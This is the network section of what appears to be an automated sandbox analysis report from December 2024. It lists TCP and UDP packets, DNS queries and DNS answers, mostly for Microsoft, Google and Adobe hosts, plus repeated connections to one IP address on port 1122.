                                                                                                                      Dec 29, 2024 13:40:40.935658932 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.938144922 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.938195944 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.938254118 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.940798044 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.940856934 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:41.964510918 CET499431122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:42.088181973 CET1122499438.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:42.088242054 CET499431122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:44.007891893 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:47.461294889 CET499431122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:47.582211018 CET1122499438.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:47.582386017 CET1122499438.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:47.582397938 CET1122499438.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:47.582410097 CET1122499438.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:48.017014027 CET1122499438.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:48.017308950 CET499431122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:48.138457060 CET1122499438.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:04.605287075 CET50227443192.168.2.4108.139.79.18
                                                                                                                      Dec 29, 2024 13:41:04.605300903 CET44350227108.139.79.18192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:04.605395079 CET50227443192.168.2.4108.139.79.18
                                                                                                                      Dec 29, 2024 13:41:04.608171940 CET50227443192.168.2.4108.139.79.18
                                                                                                                      Dec 29, 2024 13:41:04.608181000 CET44350227108.139.79.18192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:05.909897089 CET49813443192.168.2.4152.199.21.175
                                                                                                                      Dec 29, 2024 13:41:05.909913063 CET44349813152.199.21.175192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:06.260765076 CET44350227108.139.79.18192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:06.261080027 CET50227443192.168.2.4108.139.79.18
                                                                                                                      Dec 29, 2024 13:41:06.261089087 CET44350227108.139.79.18192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:06.262137890 CET44350227108.139.79.18192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:06.262198925 CET50227443192.168.2.4108.139.79.18
                                                                                                                      Dec 29, 2024 13:41:06.263479948 CET50227443192.168.2.4108.139.79.18
                                                                                                                      Dec 29, 2024 13:41:06.263545036 CET44350227108.139.79.18192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:06.263688087 CET50227443192.168.2.4108.139.79.18
                                                                                                                      Dec 29, 2024 13:41:06.263695002 CET44350227108.139.79.18192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:06.319468975 CET50227443192.168.2.4108.139.79.18
                                                                                                                      Dec 29, 2024 13:41:07.123626947 CET44350227108.139.79.18192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:07.123701096 CET44350227108.139.79.18192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:07.123754025 CET50227443192.168.2.4108.139.79.18

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 29, 2024 13:39:20.393035889 CET138138192.168.2.4192.168.2.255
                                                                                                                      Dec 29, 2024 13:40:08.679943085 CET53514291.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:08.691883087 CET53625761.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:11.478933096 CET53563801.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:12.315702915 CET5698553192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:12.315853119 CET5471153192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:12.453666925 CET53547111.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:12.453789949 CET53569851.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:18.436103106 CET5730653192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:18.436228037 CET6062753192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:18.580466986 CET6267253192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:18.580635071 CET5829253192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:18.691812038 CET5273053192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:18.691948891 CET5286453192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:18.833965063 CET5072453192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:18.834096909 CET6336353192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:18.958101034 CET5046653192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:18.958225012 CET6426853192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:18.972379923 CET53507241.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:18.972876072 CET53633631.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:28.508730888 CET53534531.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:37.345062017 CET5336553192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:37.345211029 CET5869553192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:42.746143103 CET6217753192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:42.746326923 CET4920853192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:44.692158937 CET6128253192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:44.692372084 CET6144653192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:44.793661118 CET5667153192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:44.793852091 CET5967753192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:47.195421934 CET53597561.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:47.572185040 CET5572753192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:47.572314024 CET5403553192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:48.371679068 CET53541731.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:49.882291079 CET5631253192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:49.882333040 CET5126553192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:53.098918915 CET5699353192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:53.099040031 CET6425953192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:40:53.237669945 CET53569931.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:53.237771988 CET53642591.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:04.453057051 CET5245753192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:41:04.453208923 CET6197253192.168.2.41.1.1.1
                                                                                                                      Dec 29, 2024 13:41:04.591890097 CET53619721.1.1.1192.168.2.4
                                                                                                                      Dec 29, 2024 13:41:04.595151901 CET53524571.1.1.1192.168.2.4

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 29, 2024 13:40:12.315702915 CET192.168.2.41.1.1.10x3f5aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:12.315853119 CET192.168.2.41.1.1.10x82f4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.436103106 CET192.168.2.41.1.1.10x7448Standard query (0)support.content.office.netA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.436228037 CET192.168.2.41.1.1.10x8b63Standard query (0)support.content.office.net65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.580466986 CET192.168.2.41.1.1.10xfe61Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.580635071 CET192.168.2.41.1.1.10x6414Standard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.691812038 CET192.168.2.41.1.1.10x359fStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.691948891 CET192.168.2.41.1.1.10x8155Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.833965063 CET192.168.2.41.1.1.10xaeeeStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.834096909 CET192.168.2.41.1.1.10x2b06Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.958101034 CET192.168.2.41.1.1.10x87fdStandard query (0)mem.gfx.msA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.958225012 CET192.168.2.41.1.1.10x64dbStandard query (0)mem.gfx.ms65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:37.345062017 CET192.168.2.41.1.1.10x6895Standard query (0)support.content.office.netA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:37.345211029 CET192.168.2.41.1.1.10xce19Standard query (0)support.content.office.net65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:42.746143103 CET192.168.2.41.1.1.10xe2b0Standard query (0)mem.gfx.msA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:42.746326923 CET192.168.2.41.1.1.10xce2dStandard query (0)mem.gfx.ms65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.692158937 CET192.168.2.41.1.1.10x4c01Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.692372084 CET192.168.2.41.1.1.10x8215Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.793661118 CET192.168.2.41.1.1.10x5111Standard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.793852091 CET192.168.2.41.1.1.10x435fStandard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:47.572185040 CET192.168.2.41.1.1.10xca8eStandard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:47.572314024 CET192.168.2.41.1.1.10x3842Standard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:49.882291079 CET192.168.2.41.1.1.10x6817Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:49.882333040 CET192.168.2.41.1.1.10x88cbStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.098918915 CET192.168.2.41.1.1.10xfbd3Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.099040031 CET192.168.2.41.1.1.10x83dfStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.453057051 CET192.168.2.41.1.1.10x1819Standard query (0)api.company-target.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.453208923 CET192.168.2.41.1.1.10x2f54Standard query (0)api.company-target.com65IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 29, 2024 13:40:10.999861956 CET1.1.1.1192.168.2.40xe6c6No error (0)emerald-prod-asgth3agbdfbhpgz.b02.azurefd.netshed.dual-low.s-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:10.999954939 CET1.1.1.1192.168.2.40x404dNo error (0)emerald-prod-asgth3agbdfbhpgz.b02.azurefd.netshed.dual-low.s-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:10.999954939 CET1.1.1.1192.168.2.40x404dNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:10.999954939 CET1.1.1.1192.168.2.40x404dNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:12.453666925 CET1.1.1.1192.168.2.40x82f4No error (0)www.google.com65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:12.453789949 CET1.1.1.1192.168.2.40x3f5aNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.578255892 CET1.1.1.1192.168.2.40x7448No error (0)support.content.office.netsupport.content.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.580279112 CET1.1.1.1192.168.2.40x8b63No error (0)support.content.office.netsupport.content.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.719971895 CET1.1.1.1192.168.2.40x6414No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.814213991 CET1.1.1.1192.168.2.40xfe61No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.830553055 CET1.1.1.1192.168.2.40x359fNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.830553055 CET1.1.1.1192.168.2.40x359fNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.830553055 CET1.1.1.1192.168.2.40x359fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.830553055 CET1.1.1.1192.168.2.40x359fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.832199097 CET1.1.1.1192.168.2.40x8155No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.832199097 CET1.1.1.1192.168.2.40x8155No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.956166029 CET1.1.1.1192.168.2.40xfa9eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.956166029 CET1.1.1.1192.168.2.40xfa9eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.972379923 CET1.1.1.1192.168.2.40xaeeeNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.972379923 CET1.1.1.1192.168.2.40xaeeeNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.972379923 CET1.1.1.1192.168.2.40xaeeeNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.972876072 CET1.1.1.1192.168.2.40x2b06No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:18.972876072 CET1.1.1.1192.168.2.40x2b06No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:19.096887112 CET1.1.1.1192.168.2.40x87fdNo error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:19.096887112 CET1.1.1.1192.168.2.40x87fdNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:19.096887112 CET1.1.1.1192.168.2.40x87fdNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:19.097016096 CET1.1.1.1192.168.2.40x64dbNo error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:35.727899075 CET1.1.1.1192.168.2.40xb4a4No error (0)emerald-prod-asgth3agbdfbhpgz.b02.azurefd.netshed.dual-low.s-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:35.828515053 CET1.1.1.1192.168.2.40xeb6dNo error (0)emerald-prod-asgth3agbdfbhpgz.b02.azurefd.netshed.dual-low.s-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:35.828515053 CET1.1.1.1192.168.2.40xeb6dNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:35.828515053 CET1.1.1.1192.168.2.40xeb6dNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:37.483310938 CET1.1.1.1192.168.2.40xce19No error (0)support.content.office.netsupport.content.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:37.484015942 CET1.1.1.1192.168.2.40x6895No error (0)support.content.office.netsupport.content.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:43.075625896 CET1.1.1.1192.168.2.40xce2dNo error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:43.315063953 CET1.1.1.1192.168.2.40xe2b0No error (0)mem.gfx.msamcdnmsftuswe.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:43.315063953 CET1.1.1.1192.168.2.40xe2b0No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:43.315063953 CET1.1.1.1192.168.2.40xe2b0No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.580807924 CET1.1.1.1192.168.2.40xe191No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.580807924 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.580807924 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.580807924 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.580807924 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.830488920 CET1.1.1.1192.168.2.40x4c01No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.830832958 CET1.1.1.1192.168.2.40x8215No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.932763100 CET1.1.1.1192.168.2.40x5111No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:44.933059931 CET1.1.1.1192.168.2.40x435fNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:45.587250948 CET1.1.1.1192.168.2.40xe191No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:45.587250948 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:45.587250948 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:45.587250948 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:45.587250948 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:46.591367960 CET1.1.1.1192.168.2.40xe191No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:46.591367960 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:46.591367960 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:46.591367960 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:46.591367960 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:47.710784912 CET1.1.1.1192.168.2.40x3842No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:47.826034069 CET1.1.1.1192.168.2.40xca8eNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:47.956569910 CET1.1.1.1192.168.2.40x93d7No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:47.956569910 CET1.1.1.1192.168.2.40x93d7No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:48.603214979 CET1.1.1.1192.168.2.40xe191No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:48.603214979 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:48.603214979 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:48.603214979 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:48.603214979 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.021089077 CET1.1.1.1192.168.2.40x6817No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.021089077 CET1.1.1.1192.168.2.40x6817No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.021089077 CET1.1.1.1192.168.2.40x6817No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.021089077 CET1.1.1.1192.168.2.40x6817No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.021382093 CET1.1.1.1192.168.2.40x88cbNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.021382093 CET1.1.1.1192.168.2.40x88cbNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.343826056 CET1.1.1.1192.168.2.40xdb80No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.458517075 CET1.1.1.1192.168.2.40xe737No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.458517075 CET1.1.1.1192.168.2.40xe737No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.458517075 CET1.1.1.1192.168.2.40xe737No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.826339006 CET1.1.1.1192.168.2.40xa8f5No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:50.826339006 CET1.1.1.1192.168.2.40xa8f5No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:52.606369019 CET1.1.1.1192.168.2.40xe191No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:52.606369019 CET1.1.1.1192.168.2.40xe191No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
